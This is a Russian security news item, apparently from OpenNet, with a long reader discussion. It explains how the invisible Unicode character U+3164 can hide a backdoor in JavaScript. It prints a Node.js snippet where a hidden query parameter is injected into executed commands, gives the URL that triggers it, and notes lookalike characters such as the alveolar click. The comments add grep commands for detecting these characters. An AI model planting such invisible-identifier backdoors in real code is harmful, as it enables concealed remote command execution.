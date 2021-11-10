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Применение невидимых unicode-символов для скрытия действий в JavaScript-коде

10.11.2021 12:28

Следом за методом атаки Trojan Source, основанном на применении Unicode-символов, меняющих порядок отображения двунаправленного текста, опубликована ещё одна техника внедрения скрытых действий, применимая для кода на языке JavaScript. Новый метод базируется на применении unicode-символа "ㅤ" (код 0x3164, "HANGUL FILLER"), который относится к разряду букв, но не имеет видимого содержимого. Unicode-категория, в которую входит данный символ, разрешена начиная со спецификации ECMAScript 2015 для использования в именах переменных JavaScript, что даёт возможность создавать невидимые переменные или новые переменные, не отличимые от других переменных в популярных редакторах кода, таких как Notepad++ и VS Code.

В качестве примера приводится код для платформы Node.js, в котором при помощи переменной, состоящей из одного символа "ㅤ", скрыт бэкдор, позволяющий выполнить указанный злоумышленником код: 


   app.get('/network_health', async (req, res) => {
       const { timeout,ㅤ} = req.query; // на деле указано "const { timeout,ㅤ \u3164}"
       const checkCommands = [
           'ping -c 1 google.com',
           'curl -s http://example.com/',ㅤ  // после запятой следует символ \u3164
       ];

На первый взгляд через внешний параметр передаётся только значение timeout, а массив с выполняемыми командами содержит безобидный фиксированный список. Но на деле после переменной timeout присваивается значение ещё одной невидимой переменной с кодом символа \u3164, которая также подставлена в массив исполняемых команд. Таким образом, при наличии подобной конструкции для активации бэкдора и выполнения своего кода атакующий может отправить запрос вида "https://host:8080/network_health?%E3%85%A4=команда".

В качестве ещё одного примера приводится символ "ǃ" (ALVEOLAR CLICK), который может использоваться для создания видимости указания восклицательного знака. Например, выражение "if(environmentǃ=ENV_PROD){" при выполнении в Node.js 14 всегда будет истинным, так как в нём осуществляется не проверка отличия, а присвоение переменной "environmentǃ" значения ENV_PROD. Среди вводящих в заблуждение unicode-символов, также отмечаются "／", "−", "＋", "⩵", "❨", "⫽", "꓿" и "∗".

  1. Главная ссылка к новости (https://certitude.consulting/b...)
  2. OpenNews: Атака Trojan Source для внедрения изменений в код, незаметных для разработчика
  3. OpenNews: Использование похожих Unicode-символов для обхода аутентификации
  4. OpenNews: Новый метод фишинга с использованием unicode-символов в домене
  5. OpenNews: Уязвимость, позволяющая отобразить иной домен в адресной строке браузера
  6. OpenNews: Возможность регистрации фишинговых доменов с похожими unicode-символами в имени
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56131-unicode
Ключевые слова: unicode, javascript
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Обсуждение (70) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, пох. (?), 12:43, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +13 +/
    Ну вот, счастья и привалило. Обезьянки ведь никак не могли жить без не-английских символов в именах переменных? Ну и нате вам пачку невидимых до кучи.

    Сейчас хором бросятся их запрещать-запрещать, потом следом - видимые неотличимые от пунктуационных, и так далее, до бесконечности, но так ничему и не научатся.

     
     
  • 2.4, 41 (?), 12:46, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    в довесок стоит отметить запятую-разделитель после последнего элемента структуры — так же сомнительная фича для ленивых со-стековерфлоу-копипастеров
     
     
  • 3.53, Аноним (53), 15:26, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Она есть в других языках тоже и применяется чтобы дифф уменьшать при добавлении новых полей. Но в целом я тоже против этого.
     
  • 3.67, kai3341 (ok), 17:01, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Trailing запятая-разделитель как раз удобнейший паттерн, появившийся сначала далеко не в JS
     
  • 2.5, Аноним (5), 12:47, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    хорошо что ты всё понимаешь и всегда объяснишь обезьянкам как им следует поступать
    чтобы они без тебя делали?
     
  • 2.8, Аноним (8), 12:50, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +10 +/
    🐧 ⋆ 🐼  🎀 П̷р̷о̷с̷т̷о̷ ̷т̷ы̷ ̷н̷и̷ч̷е̷г̷о̷ ̷н̷е̷ ̷п̷о̷н̷и̷м̷а̷е̷ш̷ь̷.̷ 𝐈𝐧 𝐫𝐞𝐚𝐥 𝐥𝐢𝐟𝐞 𝕌𝕟𝕚𝕔𝕠𝕕𝕖-𝕥𝕖𝕩𝕥  н⃣   е⃣   з⃣   а⃣   м⃣   е⃣   н⃣   и⃣   м⃣  🎀  🐼 ⋆ 🐧
     
     
  • 3.21, InuYasha (??), 13:12, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Точно, как без этого первоклаш..курсникам математику объяснять?
    2🐭 + 8🦊 = 🐵
    🐵*🐷 + 🦂 = 🐔🐔🐔
    великолепие же!
     
     
  • 4.22, Нанобот (ok), 13:21, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +31 +/
    log(😅)=💧log(😄)
     
  • 2.11, iPony129412 (?), 12:56, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    А gcc уже умеет в переменные с emoji? 🤨
    Когда последний раз тыкал своей палочкой палочкой - не получалось.
     
     
  • 3.15, 41 (?), 13:05, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Когда последний раз тыкал своей палочкой палочкой - не получалось

    извращенец

     
  • 3.16, Аноним84701 (ok), 13:06, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    > А gcc уже умеет в переменные с emoji? 🤨
    > Когда последний раз тыкал своей палочкой палочкой - не получалось.




    cat hello.c && gcc hello.c && ./a.out

    #include <stdio.h>
    int main (void) {
        int 🦄pony🦄 = 129412;
        printf("Hello iPony%d!", 🦄pony🦄);
        return 0;
    }
    Hello iPony129412!%


    Начиная с 10 версии.

     
     
  • 4.68, n00by (ok), 17:06, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Хватит дискриминировать поней!



    $ cat hello.c && gcc hello.c && ./a.out

    #include <locale.h>
    #include <stdio.h>
    #include <wchar.h>

    int main(void) {
        setlocale(LC_ALL, "");
        wint_t 🦄pony🦄 = 129412;
        printf("Hello iPony%lc!\n", 🦄pony🦄);
        return 0;
    }
    Hello iPony🦄!



     
  • 2.29, Тот_Самый_Анонимус (?), 14:07, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >Обезьянки ведь никак не могли жить без не-английских символов в именах переменных?

    Ну не у всех же раболепие головного мозга.
    Другое дело что сам юникод кривой. Не должно в одной строке быть два направления текста. Т.е. символ смены направления текста должен сочетаться с переносом строки. Так же не нужны невидимые симполы. Юникод давно стал помойкой, в которых таких символов быть не должно. Как и кучи символов, в виде единорогов. Но тут ты переобуешься в прыжке, ибо твой хозяин решил что единороги нужны, и спорить ты не будешь.

     
     
  • 3.35, kusb (?), 14:33, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А как цитировать что-то из арабского, например? И как раз в коде, где переменные на таких языках с переносом с переключением строки не обойдёшься, наверное.
    В принципе если есть кодировка с единорогами, то нужно и её покрывать, ведь собрались заменить все кодировки вообще...
    (Всё жду, когда добавят модификаторы уровня жирного текста, центровки, размера, css/svg и всё схлопнется в сингулярность.)
     
     
  • 4.62, Тот_Самый_Анонимус (?), 16:25, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >А как цитировать что-то из арабского, например?

    С новой строки.

    >И как раз в коде, где переменные на таких языках с переносом с переключением строки не обойдёшься, наверное.

    Тогда и операторы для них пусть тоже пишутся справа налево.

    >В принципе если есть кодировка с единорогами, то нужно и её покрывать, ведь собрались заменить все кодировки вообще...

    Не нужно. Васянистые кодировки не нужны.

    А все кодировки юникод и не перекрывает. Помню на одном сайте был шрифт, созданный для того, чтобы его символами можно было рисовать диаграммы для сянци. А в юникоде этого нет до сих пор, хотя это встократ полезнее поддержки глупых символов, вроде флага извращенцев.

     
  • 2.30, Урри (ok), 14:16, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Анонимы опеннета пробивают очередное дно. Такое ощущение, что в мире бушует эпидемия идиотизма.

    Напомню "не-обезьянкам", что O и 0 тоже одинаково отображаются. Если, конечно, у вас не правильный шрифт, который добавляет в 0 точечку (палочку) посередине. А еще 1 и l, I и l и т.д.

    Даешь запрет всех похожих символов!
    Или может просто надо использовать шрифт, который показывает разные символы по разному?

     
     
  • 3.33, Урри (ok), 14:28, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А, блин, прошу прощения у анонимов. Это же пох...
    Ну тогда не все так плохо, надеюсь.
     
  • 3.37, kusb (?), 14:36, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    У меня по разному кстати сейчас. Вот:
    https://ltdfoto.ru/images/SNIMOK86d271fea75bf9b3.png
     
     
  • 4.38, kusb (?), 14:37, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Хотя спутать можно легко, да.
     
  • 4.45, Аноним (45), 14:56, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    I и l одинаковые.

    Большая Ай и маленькая Эль.

     
  • 3.52, keydon (ok), 15:23, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Причем тут шрифт, если предполагается что символ неотображаемый? Это в других кодировках еще можно табы заменить какими-нибудь глифами, а в юникоде этих символов дочерта (U00A0, U0082, U0083, U0085 и это не полный список).
    Например Anonymous Pro который ты советуешь (пруф https://www.opennet.ru/openforum/vsluhforumID3/125739.html#182) его не отобразит. И unifont подозреваю тоже.

    Но вообще я твою мысль понял: Юникод "прост как два байта" (С) Урри
    А все проблемы которые он вызывает это не проблемы юникода, а криворукость тех кто его отображает ("текстовых редакторов", языков, библиотек, разработчиков и т.д.) и тебе плевать что эти проблемы создает юникод. Прям как в анекдоте http://anek.ws/anekdot.php?a=9639

     
  • 3.63, Аноним (63), 16:28, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    У меня эти символы отличаются абсолютно. Нужно просто использовать шрифты здорового человека, а не непонятно что. 1 от l и I отличается, | так вообще огромный символ во весь глиф (? хз как правильно называется), в отличие от других букв. 0Оо тоже абсолютно разные, хотя вот в браузере на мобильнике шрифт херовый и их можно спутать, но в системе у меня они отличаются. Хз откуда пошла мода на шрифты которые не дают отличить два похожих символа, но это уже давно не проблема
     
  • 2.69, Михрютка (ok), 17:09, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >>>Обезьянки ведь никак не могли жить без не-английских символов в именах переменных?

    в социально справедливом мире за такие слова вас бы отправили перевоспитываться в колхоз им. Греты Тундберг, писать локализацию 1с бухгалтерии на иврите. нет, на арабском, ивриты тоже угнетатели.

     
     
  • 3.73, Михрютка (ok), 17:30, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    здесь было применение невидимых юникод-символов в каментах.

     

  • 1.2, Аноним (5), 12:44, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Срочно запретить
     
     
  • 2.6, Аноним (6), 12:48, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    На жаваскрипте ничего кроме малвари пишут. Все эти запреты копирования и всё подобное это тоже малварь ещё та.
     
     
  • 3.20, QwertyReg (ok), 13:11, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Написал мамкин борцун на сайте, использующем JS.
     
     
  • 4.23, Аноним (6), 13:24, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Как я пишу тогда? Сайты, использующие жс, даже не отображаются.
     
  • 4.64, Аноним (63), 16:32, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Недавно видел сайт, который является веб мордой к SDR приемнику. Всё работает на html5 и сначала даже не понял, что js на сайте выключен. А уж тексты отправлять... почитайте, что такое POST запросы, мб через curl по приколу сюда сообщение отправите.
     
  • 2.7, Нанобот (ok), 12:49, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Проблема в людишках, не способных отличить "ㅤ"  от "". Срочно запретить людишек!
     

  • 1.3, Аноним (8), 12:46, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Невидимые символы самая очевидная сфера для злоупотреблений используют такие уже лет 20.
     
     
  • 2.10, Аноним (10), 12:52, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Какие там 20, ещё Ленин в ссылке писал письма молоком.
     
     
  • 3.12, Аноним (8), 12:59, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    В стандарте юникода, тогда такого не было.
     
  • 3.61, eee (??), 16:05, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Ленин в ссылке писал письма молоком матери.
     

  • 1.14, InuYasha (??), 13:02, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    🐵 Плохой программист: printf("Your ass is huge as my code! 🐔🐔🐔");
    🐧 Хороший программист: printlocalized(STRID_HUGEASS); // где это вообще uint.
     
  • 1.17, Аноним (17), 13:06, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > В качестве примера приводится код для платформы Node.js, в котором при помощи переменной, состоящей из одного символа "ㅤ", скрыт бэкдор, позволяющий выполнить указанный злоумышленником код:

    Для этого нужно, чтобы сервер был захвачен/под контролем. А если он захвачен, то какая разница, что именно передаётся? В чём прикол?

     
     
  • 2.25, Анонимный Анонимус (?), 13:28, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Можно незаметно с PR добавить в какую нибудь бибилиотеку, а дальше он уже по всем сайтам разнесется.
     
     
  • 3.26, Аноним (17), 13:39, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Что именно разнесётся? Дополнительный параметр к своему же сайту? Или люди мержат код, который на сторону запрашивают всё подряд и им норм? Так проблема, опять же, не в юникоде.
     
     
  • 4.75, Аноним (75), 17:42, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    эго не видит со стороны атакующего, а системный контроль предполагает глубоко рекурсивную перепроверку
     

  • 1.27, псевдонимус (?), 13:41, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Какой всё-таки замечательный зыг!
     
     
  • 2.28, BratishkaErik (ok), 14:01, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Да я тоже не нарадуюсь, но он ещё нестабилен
     

  • 1.31, Урри (ok), 14:21, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    В компиляторе раста уже исправили? Кто-то мониторит?
     
     
  • 2.46, Аноним (46), 15:04, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    да
     

  • 1.32, Георгий (??), 14:23, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Вот так можно детектить рекурсивно в текущей папке.
    Не уверен, насколько это переносимо.

    grep -R --include \*.js  -H -n $'\u3164'
    grep -R --include \*.js  -H -n $'\u1C3'

    -R
    рекурсивно

    --include
    ограничение по расширению
    Звёздочка экранирована, чтобы bash её не воспринимал.

    -H
    выводить имя файла

    -n
    выводить номер строки

    Код через доллар — это какой-то ANSI-C quoting.
    Это чтобы исключить из вывода неюникодные файлы, где код будет двумя отдельными символами. Я даже не знаю, это фича баша или грепа.
    Отсюда: https://unix.stackexchange.com/a/523339/250094

     
     
  • 2.55, Аноним (8), 15:35, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Спешу тебя огорчить таких символов очень много. И они могут по разному отображаться в разные редакторах.
     
  • 2.65, Аноним (63), 16:38, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Лучше тогда долбить на исключение, разрешая только ASCII. Проще спросить у человека "нахера ты по-китайски в коде писать начал" чем допускать, что кто-то может написать что-то на расширенной латыни.
     

  • 1.34, kusb (?), 14:28, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    set {} {}
     
  • 1.36, Аноним (36), 14:35, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > Unicode-категория, в которую входит данный символ, разрешена начиная со спецификации ECMAScript 2015 для использования в именах переменных JavaScript

    Зачем вообще это было сделано? Почему латинских букв не хватало?

     
     
  • 2.39, kusb (?), 14:38, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Национальные символы в переменных иногда это круто.
     
     
  • 3.41, пох.. (?), 14:39, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    да, очень круто - вот, можно выполнить совсем не то что написано, например.

     
     
  • 4.43, Аноним (43), 14:47, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Это не проблема языков программирования, это проблема терминалов, шрифтов, редакторов и стандартов кодирования символов типа unicode.
     
     
  • 5.47, пох.. (?), 15:11, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    точно! Терминалы плохие!

    Ведь язык программирования ну никак не может специфицировать набор символов, допустимый для использования. Он же для астрального кодинга, а не машинный язык, по самой сути своей состоящий из правил и ограничений.

    Б-ть, куда бечь от вас? На марс я на этой херне не полечу, фон Браун сдох, "наши немцы" тоже...

     
     
  • 6.72, n00by (ok), 17:28, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А ещё можно запятую перегрузить.
     
  • 5.76, Михрютка (ok), 17:57, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Это не проблема языков программирования, это проблема терминалов, шрифтов, редакторов
    > и стандартов кодирования символов типа unicode.

    И ЖИВОТНОВОДСТВА!

     
  • 4.74, Михрютка (ok), 17:34, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > да, очень круто - вот, можно выполнить совсем не то что написано,
    > например.

    можно оㅤхㅤуㅤеㅤнㅤнㅤо троллить коллег по работе, дальше уютной VS не вылезающих.


     
  • 2.40, пох.. (?), 14:39, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    тебе ж ясно сказали - обезьянка не может в енгриш!
    И вообще что это за код без переменной с цветуечком?!

    Ты наверное луддит и ретроград, и обижаешь чорных?!

     
     
  • 3.58, Аноним (8), 15:45, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Для молодого поколения кстати хорошо заходят комментарии к коду с эмоджи)
     
     
  • 4.60, пох.. (?), 16:01, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    причем с тремя типами к@кашек - она, оно и к@кашка-ниггер.

    Потом управляемая этим кодом тесла уе...вает тебя об грузовик, ну извини дорогое, так получилось.

     
  • 2.42, Аноним (43), 14:44, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну можно и в обратную сторону вопрос задать, а почему имена переменных только на английском? Получается что бы программировать нужно английский учить или писать spravka, obyavlenie, zakaz и т.д.
     
     
  • 3.48, пох.. (?), 15:12, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Ну можно и в обратную сторону вопрос задать, а почему имена переменных
    > только на английском?

    имена переменных - символами допустимого языком алфавита. Да. Еще и не с каждого при этом могут начинаться. Что в этом такого ужасного и удивительного?

    > Получается что бы программировать нужно английский учить или
    > писать spravka, obyavlenie, zakaz и т.д.

    обизьянка нишмагла вайти в айти. Катастрофа, горе, миру нужно больше кодеров!

     
  • 3.51, YetAnotherOnanym (ok), 15:23, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Чтобы хоть как-то оградить программирование от тех, кто пишет на родном "что бы" и без запятой после вводного слова "Получается".
     
  • 3.57, Аноним (8), 15:42, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Самое забавное получается имена колонок в базах данных переводить из полей в документах.  "Размер задатка", "Площадь земельного участка", "Вскрытие конкурсных приложений" и  таких колонок десяток и по какому правилу их транслировать не понятно, а переводить на простой английский потом не разберешься никогда.
     
     
  • 4.66, Аноним (63), 16:43, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Вы не путайте имена внутри кода и строки текста. Строки то хрен с ними, хоть задом наперёд пишите (хотя все таки лучше выносить это дело в отдельный хеадер или конфиг, имхо)
     
  • 2.44, Георгий (??), 14:50, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Если код связан с естественным языком (скажем, NLP), там могут быть случаи, когда код становится почти нечитаемым, если использовать перевод на английский или транслит. Сам с таким сталкивался. Если мы что-то делаем очень специфичное для языка X, некоторые вещи удобнее называть на самом этом языке X.
     
     
  • 3.49, anonymous (??), 15:15, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Вот, кстати, да, пробовал переводить на английский "корпус", "строение" и другие аналогичные вещи - получается коряво и непонятно. И это даже не NLP никакое, а простая обработка адреса.
     

  • 1.50, Аноньимъ (ok), 15:23, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Жаваскрипт как всегда жаваскрипт.
     
     
  • 2.54, Аноним (53), 15:29, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это общая проблема. В самом начале новости об этом сказано.
     
     
  • 3.59, Аноним (8), 15:46, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Формулы в экселе тоже подвержены таким же уязвимостям например.
     
  • 3.71, Аноньимъ (ok), 17:23, 10/11/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Это общая проблема. В самом начале новости об этом сказано.

    Общая для кого?

    Кто в здравом уме будет непечатные символы для имён переменных разрешать?

     

  • 1.56, microcoder (ok), 15:41, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    .
     
  • 1.70, Аноним (70), 17:19, 10/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    запретить невидимые символы в именах символах. И пофиг, ели у кого что-то сломается. Если сломалось - значит код нелегитимный.
     

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